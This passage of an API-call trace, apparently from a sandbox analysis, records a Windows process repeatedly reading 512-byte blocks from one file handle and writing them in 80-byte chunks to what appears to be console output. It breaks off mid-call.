[0142.871] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dd8c | out: lpNewFilePointer=0x0) returned 1 [0142.871] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.871] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.871] GetFileType (hFile=0x50) returned 0x1 [0142.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.871] GetFileType (hFile=0x50) returned 0x1 [0142.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.871] WriteFile (in: hFile=0x50, lpBuffer=0x20ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.871] GetFileType (hFile=0x50) returned 0x1 [0142.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.871] WriteFile (in: hFile=0x50, lpBuffer=0x20ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec0c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.872] GetFileType (hFile=0x50) returned 0x1 [0142.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.872] WriteFile (in: hFile=0x50, lpBuffer=0x20ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec5c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.872] GetFileType (hFile=0x50) returned 0x1 [0142.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.872] WriteFile (in: hFile=0x50, lpBuffer=0x20ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecac*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.872] GetFileType (hFile=0x50) returned 0x1 [0142.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.872] WriteFile (in: hFile=0x50, lpBuffer=0x20ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecfc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.872] GetFileType (hFile=0x50) returned 0x1 [0142.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.872] WriteFile (in: hFile=0x50, lpBuffer=0x20ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed4c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.872] GetFileType (hFile=0x50) returned 0x1 [0142.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.872] WriteFile (in: hFile=0x50, lpBuffer=0x20ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed9c*, lpNumberOfBytesWritten=0x20dda0*=0x20, lpOverlapped=0x0) returned 1 [0142.872] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.872] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dd8c | out: lpNewFilePointer=0x0) returned 1 [0142.872] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.872] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.872] GetFileType (hFile=0x50) returned 0x1 [0142.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.872] GetFileType (hFile=0x50) returned 0x1 [0142.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.872] WriteFile (in: hFile=0x50, lpBuffer=0x20ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.873] GetFileType (hFile=0x50) returned 0x1 [0142.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.873] WriteFile (in: hFile=0x50, lpBuffer=0x20ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec0c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.873] GetFileType (hFile=0x50) returned 0x1 [0142.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.873] WriteFile (in: hFile=0x50, lpBuffer=0x20ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec5c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.873] GetFileType (hFile=0x50) returned 0x1 [0142.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.873] WriteFile (in: hFile=0x50, lpBuffer=0x20ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecac*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.873] GetFileType (hFile=0x50) returned 0x1 [0142.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.873] WriteFile (in: hFile=0x50, lpBuffer=0x20ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecfc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.873] GetFileType (hFile=0x50) returned 0x1 [0142.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.873] WriteFile (in: hFile=0x50, lpBuffer=0x20ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed4c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.873] GetFileType (hFile=0x50) returned 0x1 [0142.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.873] WriteFile (in: hFile=0x50, lpBuffer=0x20ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed9c*, lpNumberOfBytesWritten=0x20dda0*=0x20, lpOverlapped=0x0) returned 1 [0142.873] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.873] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dd8c | out: lpNewFilePointer=0x0) returned 1 [0142.873] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.873] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.874] GetFileType (hFile=0x50) returned 0x1 [0142.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.874] GetFileType (hFile=0x50) returned 0x1 [0142.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.874] WriteFile (in: hFile=0x50, lpBuffer=0x20ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.874] GetFileType (hFile=0x50) returned 0x1 [0142.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.874] WriteFile (in: hFile=0x50, lpBuffer=0x20ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec0c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.874] GetFileType (hFile=0x50) returned 0x1 [0142.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.874] WriteFile (in: hFile=0x50, lpBuffer=0x20ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec5c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.874] GetFileType (hFile=0x50) returned 0x1 [0142.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.874] WriteFile (in: hFile=0x50, lpBuffer=0x20ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecac*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.921] GetFileType (hFile=0x50) returned 0x1 [0142.921] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.921] WriteFile (in: hFile=0x50, lpBuffer=0x20ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecfc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.921] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.921] GetFileType (hFile=0x50) returned 0x1 [0142.921] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.921] WriteFile (in: hFile=0x50, lpBuffer=0x20ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed4c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.921] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.921] GetFileType (hFile=0x50) returned 0x1 [0142.921] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.921] WriteFile (in: hFile=0x50, lpBuffer=0x20ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed9c*, lpNumberOfBytesWritten=0x20dda0*=0x20, lpOverlapped=0x0) returned 1 [0142.921] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.921] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dd8c | out: lpNewFilePointer=0x0) returned 1 [0142.921] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.921] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.921] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.921] GetFileType (hFile=0x50) returned 0x1 [0142.921] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.921] GetFileType (hFile=0x50) returned 0x1 [0142.921] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.922] WriteFile (in: hFile=0x50, lpBuffer=0x20ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.922] GetFileType (hFile=0x50) returned 0x1 [0142.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.922] WriteFile (in: hFile=0x50, lpBuffer=0x20ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec0c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.922] GetFileType (hFile=0x50) returned 0x1 [0142.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.922] WriteFile (in: hFile=0x50, lpBuffer=0x20ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec5c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.922] GetFileType (hFile=0x50) returned 0x1 [0142.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.922] WriteFile (in: hFile=0x50, lpBuffer=0x20ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecac*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.922] GetFileType (hFile=0x50) returned 0x1 [0142.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.922] WriteFile (in: hFile=0x50, lpBuffer=0x20ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecfc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.922] GetFileType (hFile=0x50) returned 0x1 [0142.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.922] WriteFile (in: hFile=0x50, lpBuffer=0x20ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed4c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.923] GetFileType (hFile=0x50) returned 0x1 [0142.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.923] WriteFile (in: hFile=0x50, lpBuffer=0x20ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed9c*, lpNumberOfBytesWritten=0x20dda0*=0x20, lpOverlapped=0x0) returned 1 [0142.923] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.923] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dd8c | out: lpNewFilePointer=0x0) returned 1 [0142.923] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.923] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.923] GetFileType (hFile=0x50) returned 0x1 [0142.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.923] GetFileType (hFile=0x50) returned 0x1 [0142.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.923] WriteFile (in: hFile=0x50, lpBuffer=0x20ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.923] GetFileType (hFile=0x50) returned 0x1 [0142.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.923] WriteFile (in: hFile=0x50, lpBuffer=0x20ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec0c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.923] GetFileType (hFile=0x50) returned 0x1 [0142.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.923] WriteFile (in: hFile=0x50, lpBuffer=0x20ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec5c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.923] GetFileType (hFile=0x50) returned 0x1 [0142.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.924] WriteFile (in: hFile=0x50, lpBuffer=0x20ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecac*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.924] GetFileType (hFile=0x50) returned 0x1 [0142.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.924] WriteFile (in: hFile=0x50, lpBuffer=0x20ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecfc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.924] GetFileType (hFile=0x50) returned 0x1 [0142.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.924] WriteFile (in: hFile=0x50, lpBuffer=0x20ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed4c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.924] GetFileType (hFile=0x50) returned 0x1 [0142.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.924] WriteFile (in: hFile=0x50, lpBuffer=0x20ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed9c*, lpNumberOfBytesWritten=0x20dda0*=0x20, lpOverlapped=0x0) returned 1 [0142.924] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.924] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dd8c | out: lpNewFilePointer=0x0) returned 1 [0142.924] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.924] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.924] GetFileType (hFile=0x50) returned 0x1 [0142.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.924] GetFileType (hFile=0x50) returned 0x1 [0142.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.924] WriteFile (in: hFile=0x50, lpBuffer=0x20ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.924] GetFileType (hFile=0x50) returned 0x1 [0142.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.925] WriteFile (in: hFile=0x50, lpBuffer=0x20ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec0c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.925] GetFileType (hFile=0x50) returned 0x1 [0142.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.925] WriteFile (in: hFile=0x50, lpBuffer=0x20ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec5c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.925] GetFileType (hFile=0x50) returned 0x1 [0142.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.925] WriteFile (in: hFile=0x50, lpBuffer=0x20ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecac*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.925] GetFileType (hFile=0x50) returned 0x1 [0142.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.925] WriteFile (in: hFile=0x50, lpBuffer=0x20ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecfc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.925] GetFileType (hFile=0x50) returned 0x1 [0142.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.925] WriteFile (in: hFile=0x50, lpBuffer=0x20ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed4c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.925] GetFileType (hFile=0x50) returned 0x1 [0142.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.925] WriteFile (in: hFile=0x50, lpBuffer=0x20ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed9c*, lpNumberOfBytesWritten=0x20dda0*=0x20, lpOverlapped=0x0) returned 1 [0142.925] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.925] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dd8c | out: lpNewFilePointer=0x0) returned 1 [0142.925] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.925] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.925] GetFileType (hFile=0x50) returned 0x1 [0142.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.925] GetFileType (hFile=0x50) returned 0x1 [0142.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.926] WriteFile (in: hFile=0x50, lpBuffer=0x20ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.926] GetFileType (hFile=0x50) returned 0x1 [0142.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.926] WriteFile (in: hFile=0x50, lpBuffer=0x20ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec0c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.926] GetFileType (hFile=0x50) returned 0x1 [0142.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.926] WriteFile (in: hFile=0x50, lpBuffer=0x20ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec5c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.926] GetFileType (hFile=0x50) returned 0x1 [0142.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.926] WriteFile (in: hFile=0x50, lpBuffer=0x20ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecac*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.926] GetFileType (hFile=0x50) returned 0x1 [0142.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.926] WriteFile (in: hFile=0x50, lpBuffer=0x20ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecfc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.926] GetFileType (hFile=0x50) returned 0x1 [0142.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.926] WriteFile (in: hFile=0x50, lpBuffer=0x20ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed4c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.926] GetFileType (hFile=0x50) returned 0x1 [0142.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.926] WriteFile (in: hFile=0x50, lpBuffer=0x20ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed9c*, lpNumberOfBytesWritten=0x20dda0*=0x20, lpOverlapped=0x0) returned 1 [0142.926] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.926] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dd8c | out: lpNewFilePointer=0x0) returned 1 [0142.926] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.927] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.927] GetFileType (hFile=0x50) returned 0x1 [0142.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.927] GetFileType (hFile=0x50) returned 0x1 [0142.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.927] WriteFile (in: hFile=0x50, lpBuffer=0x20ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.927] GetFileType (hFile=0x50) returned 0x1 [0142.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.927] WriteFile (in: hFile=0x50, lpBuffer=0x20ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | 